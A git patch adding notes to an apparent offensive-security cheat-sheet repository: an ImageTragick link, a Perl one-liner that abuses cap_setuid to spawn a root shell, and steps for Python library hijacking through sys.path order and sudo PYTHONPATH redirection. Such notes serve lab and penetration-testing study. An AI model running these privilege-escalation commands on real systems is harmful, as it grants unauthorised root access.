From d9243ba0b6caaf183cd5a9d2b82e4c79b2fa965d Mon Sep 17 00:00:00 2001
From: whx <stefan@stefan.works>
Date: Sat, 9 Oct 2021 01:21:51 +0200
Subject: [PATCH] stuff

---
 exploit/imagemagick/imagetragick.md |  3 +++
 exploit/linux/capabilities.md       |  6 ++++++
 exploit/python/lib_hijack.md        | 22 ++++++++++++++++++++++
 3 files changed, 31 insertions(+)
 create mode 100644 exploit/imagemagick/imagetragick.md
 create mode 100644 exploit/python/lib_hijack.md

diff --git a/exploit/imagemagick/imagetragick.md b/exploit/imagemagick/imagetragick.md
new file mode 100644
index 0000000..0d80eb1
--- /dev/null
+++ b/exploit/imagemagick/imagetragick.md
@@ -0,0 +1,3 @@
+# ImageTragick
+
+* [ImageTragick Website](https://imagetragick.com)
diff --git a/exploit/linux/capabilities.md b/exploit/linux/capabilities.md
index a524736..2a393a4 100644
--- a/exploit/linux/capabilities.md
+++ b/exploit/linux/capabilities.md
@@ -3,6 +3,12 @@
 * [HackTricks](https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities)
 
 ## Usage
+* Find capabilities
 ```sh
 getcap -r  / 2>/dev/null
 ```
+
+* `cap_setuid` through `/bin/perl`
+```sh
+perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh"'
+```
diff --git a/exploit/python/lib_hijack.md b/exploit/python/lib_hijack.md
new file mode 100644
index 0000000..81de964
--- /dev/null
+++ b/exploit/python/lib_hijack.md
@@ -0,0 +1,22 @@
+# Library Hijacking
+
+* [Article](https://medium.com/analytics-vidhya/python-library-hijacking-on-linux-with-examples-a31e6a9860c8)
+
+## Interpreter might be called invoking sudo 
+* Write into a library called inside the script
+
+## Path call order of packages
+* Order of paths which are invoked to find packages may be found via
+```sh
+python -c 'import sys; print("\n".join(sys.path))'
+```
+* Higher order directory on a path may have write permission. Insert a similar named package that gets called in the script.
+* The highest order is `pwd`
+
+## Redirecting PYTHONPATH 
+* `SETENV` may be set while loading script through `sudo`
+```sh
+sudo PYTHONPATH=/tmp/ /usr/bin/python3.6 <script.py>
+```
+
+